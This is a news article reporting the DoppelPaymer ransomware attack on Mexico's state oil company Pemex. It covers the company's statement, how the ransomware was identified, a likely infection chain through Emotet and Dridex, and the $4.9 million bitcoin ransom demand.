Mexico's state-owned oil company, Pemex, has suffered a DoppelPaymer ransomware attack that demanded $4.9 million USD in order to decrypt their files.

On Sunday, November 10th, Pemex was hit with a ransomware attack that the company states affected less than 5% of their computers. Workers reported, though, that internal memos told them not to initially turn on their computers, but were up and running again later in the day on Monday.

In a later statement posted to Twitter, Pemex states that they are operating normally and that there was no affect on their fuel production, supply, and inventory.

Pemex operates normally * Operation and production systems operate normally

* Inventory and fuel supply is guaranteed

* The oil community and society should disregard rumors that damage the image of the company. In the face of the wave of apocryphal rumors and communiqués, notes and comments on social media about an attack on internal computer systems belonging to Petroleos Mexicanos, the company reports the following: Petroleos Mexicanos operates normally. Operation and production systems of the company have not been compromised, and are protected.

The internal network of Pemex, like all major companies and government institutions and financial, national and international, are often the target of cyber threats and attacks that as of today have not been successul. Yesterday, Sunday, November 10, the state's production company was the target of attempted attacks that were neutralized in a timely manner, affecting the functioning of less than 5% of the personal computer equipment. However, Pemex reiterates that fuel production, supply, and inventories are safe.

Pemex improves the security of its computer systems and encourages/recommends members of the oil community and the society to disregard rumors that hurt the image of the company.

Hit by DoppelPaymer Ransomware

While reports initially stated that Pemex was affected by the Ryuk Ransomware, leaked ransom notes and the Tor payment site confirm that it was the DoppelPaymer infection, which is an offshoot of the BitPaymer ransomware.

In a screenshot of the leaked ransom notes shared with BleepingComputer by security researcher Pollo, we were able to clearly identify the ransomware as DoppelPaymer. While the ransom note shares many similarities to the BitPaymer ransom note, you can see that it includes the DATA portion, which is unique to DoppelPaymer.

Pemex DoppelPaymer Ransom Note

Though the ransom note does not indicate the name of the company, a source familiar with the matter shared the full Tor payment site URL with BleepingComputer, which identifies Pemex as the victim.

Tor Payment Site for Pemex

Security researchers MalwareHunterTeam and Vitali Kremez were also able to find the malware sample used in the Pemex attack, which further confirms the DoppelPaymer infection.

Kremez told BleepingComputer in conversations that Pemex was probably targeted by an initial infection of the Emotet Trojan, which then dropped the Dridex malware.

This would have eventually provided network access to the DoppelPayer actors who would then have used Cobalt Strike and PowerShell Empire to spread the ransomware laterally through the rest of the network.

Attackers demanded a $4.9 Million ransom

With access to the Tor Payment Site for the victim, we can see the that the DoppelPaymer group demanded 565 bitcoins, or $4,899,295.80 USD at today's prices.

Pemex Ransom Demand of 565 Bitcoins

The DoppelPaymer payment site offers a chat feature where a victim can get support or negotiate with the ransomware developers.

This online chat is empty, which indicates that Pemex did not attempt to use it to discuss the ransom with the attackers.